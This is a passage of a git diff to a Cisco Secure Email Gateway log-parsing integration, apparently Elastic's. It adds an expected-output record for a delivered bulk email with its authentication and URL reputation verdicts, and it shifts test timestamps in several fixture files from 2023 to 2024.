"cisco_secure_email_gateway": { + "log": { + "act": "DELIVERED", + "appliance": { + "product": "C100V Secure Email Gateway Virtual", + "vendor": "Cisco", + "version": "15.0.1-030" + }, + "category": { + "name": "consolidated_event" + }, + "cef_format_version": "0", + "cfp1": 5.2, + "cfp1_label": "SBRSScore", + "cs1": "DEFAULT", + "cs1_label": "MailPolicy", + "cs2": "Germany", + "cs2_label": "SenderCountry", + "cs3": "N/A", + "cs3_label": "SDRThreatCategory", + "cs4": "588d90f8-92d8-45a9-bd6d-145f2d19c348@fra3s50mta17.xt.local", + "cs4_label": "ExternalMsgID", + "cs6": "Neutral", + "cs6_label": "SDRRepScore", + "data": { + "ip": "1.128.3.4" + }, + "device_direction": "incoming", + "esa": { + "amp_verdict": "SKIPPED", + "as_verdict": "BULK_MAIL", + "av_verdict": "NOT_EVALUATED", + "content_filter_verdict": "MATCH", + "delivery_connection_id": "1980232", + "dkim_verdict": "pass", + "dlp_verdict": "NOT_EVALUATED", + "dmarc_verdict": "pass", + "friendly_from": "\\\"Zander, Petra Petra.Zander at druseidt.de\\\" ", + "graymail_verdict": "POSITIVE", + "helo": { + "domain": "gr1.mta.exacttarget.com", + "ip": "89.160.20.128" + }, + "injection_connection_id": "6274403", + "mail_flow_policy": "ACCEPT", + "mf_verdict": "MATCH", + "msg_size": 53966, + "outbreak_filter_verdict": "NEGATIVE", + "reply_to": "Petra.Zander@druseidt.de", + "sdr_consolidated_domain_age": "30 days (or greater)", + "sender_group": "ACCEPTLIST", + "spf_verdict": "{'mailfrom': {'result': 'Pass', 'sender': 'bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com'}}", + "tls": { + "in": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + }, + "out": { + "cipher": "ECDHE-RSA-AES256-GCM-SHA384", + "connection_status": "Success", + "protocol": "TLSv1.2" + } + }, + "url_details": "{'www.druseidt.de': {'WbrsScore': 0.0}, 'http://www.druseidt.de': {'WbrsScore': 0.0}, 'www.client.test': {'WbrsScore': 3.0}, 'http://shop.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/shared_images/logo_mail.gif': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf0fbe79278be9131d8a5f9d077166c028a794c44100a7d1bd0cb97fa4ee801e339d368b418d777b258f4ccf219dcc927a': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/linkedin-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb47c7294d29dc300961df8ff20d96ef9d601738303abf9a32624db5bd04c6aa12133860be145983ffaf8aa1cf6ff6366': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/Logo+Matelec_color.png': {'WbrsScore': 3.0}, 'https://view.madrid.client.test/?qs=e2dc929383b279c71d8336589af96b30654ef13649d6d623810be8288cdb21419575cd44128cfcf836b2fb40daabe640b4f18b65eb0e1801a33efdd9ae76044b14467fe768e393e5c22e277ab02da833': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf9771d069b13360d9a133714361b81ec9465f9a84c46696d96e7d18f3487c0ff31e0212f1f6e849de9a3223dd9863f002cdeb13ba18b565e0': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf46beed6826b6ff7769db3cb1f6da294588712812697d57e094a03da3cfa9e305ba582571e734b2b82d4eaf467a5d7568': {'WbrsScore': 3.0}, 'http://www.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/vcf/pzander.vcf': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf2be2e6ccf73caccbf4f52fc62a17aa07d7d5e90a1be6105af4327cf8af71cc72e6d2ad74e3f2fc5599d3db7338ebc58d': {'WbrsScore': 3.0}, 'http://schemas.microsoft.com/office/2004/12/omml': {'WbrsScore': 9.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/YB-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/open.aspx?ffcb10-fec2177673660c79-fe6313707565057f7c1c-fe37117175640478731774-ff69167071-fe321571776c0678751076-ffce15&d=500013&bmt=0': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/instagram-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaff14314989caba41c1a5c77b84da37a17d2892f1926a349aa4bd652bf45762dd2598f1f4f1881bb05d8243a92a5494d96': {'WbrsScore': 3.0}, 'www.aepd.es': {'WbrsScore': 3.0}, 'www.listarobinson.es': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/enviar.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafa34c9728602b5f8b6e579445d6b89cf18e1f08e5e55db9abbe8d799119fbfed7b6cd873eec897ebeb562b5f69d3eea22': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafc5743c46f1be2c31fbcd171dd7a1c1f968ce7a15cdc8979f0f2fb71c3e2687f8c15807cecb222cb019a91c31d26f4490': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/facebook-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafebd823e115b97548dfb95b1c01a50ba6df8b8df68274be7e4a7dbf09471cde018af63e3eb3c7565a517f880127b24297': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/logo-client-png.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb400a6b6ceae5b73082235cabda876ece1ee91069f499e6e9d03be8953a9b0c08d64a08fa189b567bcc69f5a05bbc865': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/twitter+x.png': {'WbrsScore': 3.0}, 'http://druseidt.de/englisch/messen/messen.html': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafce9df9b86e788cce7959f98ce975c0dfc316987fe80c3c8dd6bf4adf9815d4297b04cdb2e0a678c7caf598e8cf298edb': {'WbrsScore': 3.0}}" + }, + "event": { + "name": "Consolidated Log Event" + }, + "event_class_id": "ESA_CONSOLIDATED_LOG_EVENT", + "listener": { + "name": "MailFlow" + }, + "message": "CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873887 ESAICID=6274403 ESADCID=1980232 ESAAMPVerdict=SKIPPED ESAASVerdict=BULK_MAIL ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:31 2024 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED ESADMARCVerdict=pass dvc=1.128.3.4 ESAFriendlyFrom=\\\"Zander, Petra Petra.Zander at druseidt.de\\\" ESAGMVerdict=POSITIVE start=Thu Feb 29 13:24:22 2024 deviceInboundInterface=MailFlow deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=Germany ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='<588d90f8-92d8-45a9-bd6d-145f2d19c348@fra3s50mta17.xt.local>' ESAMsgSize=53966 ESAOFVerdict=NEGATIVE duser=matelec@client.test ESAHeloDomain=gr1.mta.exacttarget.com ESAHeloIP=89.160.20.128 ESAReplyTo=Petra.Zander@druseidt.de cfp1Label=SBRSScore cfp1=5.2 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com'}} shost=gr1.mta.exacttarget.com ESASenderGroup=ACCEPTLIST src=216.160.83.56 msg='AW: Important information for your participation as an exhibitor' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'www.druseidt.de': {'WbrsScore': 0.0}, 'http://www.druseidt.de': {'WbrsScore': 0.0}, 'www.client.test': {'WbrsScore': 3.0}, 'http://shop.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/shared_images/logo_mail.gif': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf0fbe79278be9131d8a5f9d077166c028a794c44100a7d1bd0cb97fa4ee801e339d368b418d777b258f4ccf219dcc927a': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/linkedin-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb47c7294d29dc300961df8ff20d96ef9d601738303abf9a32624db5bd04c6aa12133860be145983ffaf8aa1cf6ff6366': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/Logo+Matelec_color.png': {'WbrsScore': 3.0}, 'https://view.madrid.client.test/?qs=e2dc929383b279c71d8336589af96b30654ef13649d6d623810be8288cdb21419575cd44128cfcf836b2fb40daabe640b4f18b65eb0e1801a33efdd9ae76044b14467fe768e393e5c22e277ab02da833': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf9771d069b13360d9a133714361b81ec9465f9a84c46696d96e7d18f3487c0ff31e0212f1f6e849de9a3223dd9863f002cdeb13ba18b565e0': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf46beed6826b6ff7769db3cb1f6da294588712812697d57e094a03da3cfa9e305ba582571e734b2b82d4eaf467a5d7568': {'WbrsScore': 3.0}, 'http://www.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/vcf/pzander.vcf': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf2be2e6ccf73caccbf4f52fc62a17aa07d7d5e90a1be6105af4327cf8af71cc72e6d2ad74e3f2fc5599d3db7338ebc58d': {'WbrsScore': 3.0}, 'http://schemas.microsoft.com/office/2004/12/omml': {'WbrsScore': 9.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/YB-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/open.aspx?ffcb10-fec2177673660c79-fe6313707565057f7c1c-fe37117175640478731774-ff69167071-fe321571776c0678751076-ffce15&d=500013&bmt=0': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/instagram-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaff14314989caba41c1a5c77b84da37a17d2892f1926a349aa4bd652bf45762dd2598f1f4f1881bb05d8243a92a5494d96': {'WbrsScore': 3.0}, 'www.aepd.es': {'WbrsScore': 3.0}, 'www.listarobinson.es': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/enviar.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafa34c9728602b5f8b6e579445d6b89cf18e1f08e5e55db9abbe8d799119fbfed7b6cd873eec897ebeb562b5f69d3eea22': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafc5743c46f1be2c31fbcd171dd7a1c1f968ce7a15cdc8979f0f2fb71c3e2687f8c15807cecb222cb019a91c31d26f4490': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/facebook-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafebd823e115b97548dfb95b1c01a50ba6df8b8df68274be7e4a7dbf09471cde018af63e3eb3c7565a517f880127b24297': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/logo-client-png.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb400a6b6ceae5b73082235cabda876ece1ee91069f499e6e9d03be8953a9b0c08d64a08fa189b567bcc69f5a05bbc865': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/twitter+x.png': {'WbrsScore': 3.0}, 'http://druseidt.de/englisch/messen/messen.html': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafce9df9b86e788cce7959f98ce975c0dfc316987fe80c3c8dd6bf4adf9815d4297b04cdb2e0a678c7caf598e8cf298edb': {'WbrsScore': 3.0}}" + } + }, + "ecs": { + "version": "8.11.0" + }, + "email": { + "from": { + "address": [ + "bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com" + ] + }, + "message_id": "17873887", + "subject": "AW: Important information for your participation as an exhibitor", + "to": { + "address": [ + "matelec@client.test" + ] + } + }, + "event": { + "end": "2024-02-29T13:24:31.000Z", + "kind": "event", + "original": "<14>Jul 04 06:21:54 consolidated_event: CEF:0|Cisco|C100V Secure Email Gateway Virtual|15.0.1-030|ESA_CONSOLIDATED_LOG_EVENT|Consolidated Log Event|5|deviceExternalId=4235AF15AF7E90350F1D-F01741F5D5BE ESAMID=17873887 ESAICID=6274403 ESADCID=1980232 ESAAMPVerdict=SKIPPED ESAASVerdict=BULK_MAIL ESAAVVerdict=NOT_EVALUATED ESACFVerdict=MATCH end=Thu Feb 29 13:24:31 2024 ESADKIMVerdict=pass ESADLPVerdict=NOT_EVALUATED ESADMARCVerdict=pass dvc=1.128.3.4 ESAFriendlyFrom=\\\"Zander, Petra Petra.Zander at druseidt.de\\\" ESAGMVerdict=POSITIVE start=Thu Feb 29 13:24:22 2024 deviceInboundInterface=MailFlow deviceDirection=0 ESAMailFlowPolicy=ACCEPT suser=bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com cs1Label=MailPolicy cs1=DEFAULT cs2Label=SenderCountry cs2=Germany ESAMFVerdict=MATCH act=DELIVERED cs4Label=ExternalMsgID cs4='<588d90f8-92d8-45a9-bd6d-145f2d19c348@fra3s50mta17.xt.local>' ESAMsgSize=53966 ESAOFVerdict=NEGATIVE duser=matelec@client.test ESAHeloDomain=gr1.mta.exacttarget.com ESAHeloIP=89.160.20.128 ESAReplyTo=Petra.Zander@druseidt.de cfp1Label=SBRSScore cfp1=5.2 ESASDRDomainAge=30 days (or greater) cs3Label=SDRThreatCategory cs3=N/A cs6Label=SDRRepScore cs6=Neutral ESASPFVerdict={'mailfrom': {'result': 'Pass', 'sender': 'bounce-65_HTML-20370779-70256-500000023-9392603@bounce.j.s50.etmailservices.com'}} shost=gr1.mta.exacttarget.com ESASenderGroup=ACCEPTLIST src=216.160.83.56 msg='AW: Important information for your participation as an exhibitor' ESATLSInCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSInConnStatus=Success ESATLSInProtocol=TLSv1.2 ESATLSOutCipher=ECDHE-RSA-AES256-GCM-SHA384 ESATLSOutConnStatus=Success ESATLSOutProtocol=TLSv1.2 ESAURLDetails={'www.druseidt.de': {'WbrsScore': 0.0}, 'http://www.druseidt.de': {'WbrsScore': 0.0}, 'www.client.test': {'WbrsScore': 3.0}, 'http://shop.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/shared_images/logo_mail.gif': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf0fbe79278be9131d8a5f9d077166c028a794c44100a7d1bd0cb97fa4ee801e339d368b418d777b258f4ccf219dcc927a': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/linkedin-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb47c7294d29dc300961df8ff20d96ef9d601738303abf9a32624db5bd04c6aa12133860be145983ffaf8aa1cf6ff6366': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/Logo+Matelec_color.png': {'WbrsScore': 3.0}, 'https://view.madrid.client.test/?qs=e2dc929383b279c71d8336589af96b30654ef13649d6d623810be8288cdb21419575cd44128cfcf836b2fb40daabe640b4f18b65eb0e1801a33efdd9ae76044b14467fe768e393e5c22e277ab02da833': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf9771d069b13360d9a133714361b81ec9465f9a84c46696d96e7d18f3487c0ff31e0212f1f6e849de9a3223dd9863f002cdeb13ba18b565e0': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf46beed6826b6ff7769db3cb1f6da294588712812697d57e094a03da3cfa9e305ba582571e734b2b82d4eaf467a5d7568': {'WbrsScore': 3.0}, 'http://www.druseidt.de/': {'WbrsScore': 0.0}, 'http://www.druseidt.de/vcf/pzander.vcf': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaf2be2e6ccf73caccbf4f52fc62a17aa07d7d5e90a1be6105af4327cf8af71cc72e6d2ad74e3f2fc5599d3db7338ebc58d': {'WbrsScore': 3.0}, 'http://schemas.microsoft.com/office/2004/12/omml': {'WbrsScore': 9.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/YB-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/open.aspx?ffcb10-fec2177673660c79-fe6313707565057f7c1c-fe37117175640478731774-ff69167071-fe321571776c0678751076-ffce15&d=500013&bmt=0': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/instagram-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddaff14314989caba41c1a5c77b84da37a17d2892f1926a349aa4bd652bf45762dd2598f1f4f1881bb05d8243a92a5494d96': {'WbrsScore': 3.0}, 'www.aepd.es': {'WbrsScore': 3.0}, 'www.listarobinson.es': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/enviar.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafa34c9728602b5f8b6e579445d6b89cf18e1f08e5e55db9abbe8d799119fbfed7b6cd873eec897ebeb562b5f69d3eea22': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafc5743c46f1be2c31fbcd171dd7a1c1f968ce7a15cdc8979f0f2fb71c3e2687f8c15807cecb222cb019a91c31d26f4490': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/facebook-news.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafebd823e115b97548dfb95b1c01a50ba6df8b8df68274be7e4a7dbf09471cde018af63e3eb3c7565a517f880127b24297': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe2a1171756404787c1d78/m/1/logo-client-png.png': {'WbrsScore': 3.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafb400a6b6ceae5b73082235cabda876ece1ee91069f499e6e9d03be8953a9b0c08d64a08fa189b567bcc69f5a05bbc865': {'WbrsScore': 3.0}, 'https://image.madrid.client.test/lib/fe37117175640478731774/m/1/twitter+x.png': {'WbrsScore': 3.0}, 'http://druseidt.de/englisch/messen/messen.html': {'WbrsScore': 0.0}, 'https://click.madrid.client.test/?qs=b5641e4b32b2ddafce9df9b86e788cce7959f98ce975c0dfc316987fe80c3c8dd6bf4adf9815d4297b04cdb2e0a678c7caf598e8cf298edb': {'WbrsScore': 3.0}}", + "severity": "5", + "start": "2024-02-29T13:24:22.000Z", + "timezone": "UTC" + }, + "host": { + "id": "4235AF15AF7E90350F1D-F01741F5D5BE" + }, + "log": { + "syslog": { + "priority": 14 + } + }, + "related": { + "ip": [ + "89.160.20.128", + "1.128.3.4", + "216.160.83.56" + ] + }, + "source": { + "domain": "gr1.mta.exacttarget.com", + "ip": "216.160.83.56" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-content-scanner.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-content-scanner.log-expected.json index 48672e6b6a1..318e045d04f 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-content-scanner.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-content-scanner.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -34,7 +34,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-error.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-error.log-expected.json index 41c66472d21..7f3578d03bd 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-error.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-error.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "alert_category": "Quarantine", @@ -34,7 +34,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -76,7 +76,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -116,7 +116,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-gui-log.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-gui-log.log-expected.json index eecf25365d9..8bee5dea4d2 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-gui-log.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-gui-log.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -75,7 +75,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -130,7 +130,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "action": "logged out", @@ -174,7 +174,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -218,7 +218,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -256,7 +256,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "action": "The HTTPS session has been established successfully.", @@ -302,7 +302,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -332,7 +332,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -362,7 +362,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -401,7 +401,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -440,7 +440,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "action": "changed", diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-status.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-status.log-expected.json index c6ba96b5803..1540d0ff379 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-status.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-status.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-30T15:12:26.000Z", + "@timestamp": "2024-03-30T15:12:26.000Z", "cisco_secure_email_gateway": { "log": { "5xx_hard_bounces": 0, diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-system.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-system.log-expected.json index 25755775ac9..d9249dfc6f6 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-system.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-system.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -41,7 +41,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -75,7 +75,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -105,7 +105,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -135,7 +135,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-text-mail.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-text-mail.log-expected.json index 07538291a4f..a333226c03d 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-text-mail.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-text-mail.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -36,7 +36,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -66,7 +66,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -99,7 +99,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -135,7 +135,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "address": "1.128.3.4", @@ -181,7 +181,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -214,7 +214,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -251,7 +251,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -289,7 +289,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -326,7 +326,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -356,7 